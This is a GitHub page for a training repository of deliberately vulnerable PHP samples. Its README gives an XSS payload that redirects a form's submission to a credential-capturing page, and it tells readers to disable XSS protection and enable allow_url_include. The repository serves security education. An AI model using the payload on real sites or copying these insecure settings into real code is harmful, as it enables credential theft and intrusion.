Skip to content
Samples of web vulnerabilities when using php. Use as a reference to become a better developer and be aware of security vulnerabilities.
Branch: master
Clone or download
Fetching latest commit…
Cannot retrieve the latest commit at this time.
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
code-injection-php
xss-php
.gitignnore
README.md

README.md

php-hacking

Setup

Install XAMP or another based on your operating system. If using MAMP for mac clone this repo inside the /Applications/MAMP/htdocs directory.

cd /Applications/MAMP/htdocs
git clone git@github.com:ar-to/php-hacking.git

or create a symbolic link from where you prefer to clone it into and the directory where your server looks to serve you files.

cd /repos
git clone git@github.com:ar-to/php-hacking.git
ln -s -v ~/repos/php-hacking /Applications/MAMP/htdocs/php-hacking

Open the correct url for the sample. See below.

Browser

Change the port to the one provided by your server. Below uses MAMP 8888.

Instructions

XSS via Form action

This sample is mostly taken from the following youtube video but some changes were made including:

  • bypassing chrome xss protection
  • showing javascript code to get url params, which I took from here
  • you may find additional info about XSS here

Steps

  1. test the forms
  2. past the javascript code into the search input ans submit:
<script>window.onload=function() {document.forms[0].action = "http://localhost:8888/php-hacking/xss-php/stolen.php"};</script>

The url is relative to the directory of this sample, but it could be an external one pointing to a remote server where the attacker can save the credentials into a databse or their own file. 3. If you are using Chrome and get an error: ERR_BLOCKED_BY_XSS_AUDITOR uncomment header('X-XSS-Protection:0'); from the top of xss-php/xss-form-action/php and retry. 4. check the log.txt file in the xss-php directory

Code injection via include and url param

References

  • php.ini docs
  • this sample was taken from here but I included instructions on usage and having to turn allow-url-include on before this can work.
  1. test the form
  2. Follow the instructions in the page
You can’t perform that action at this time.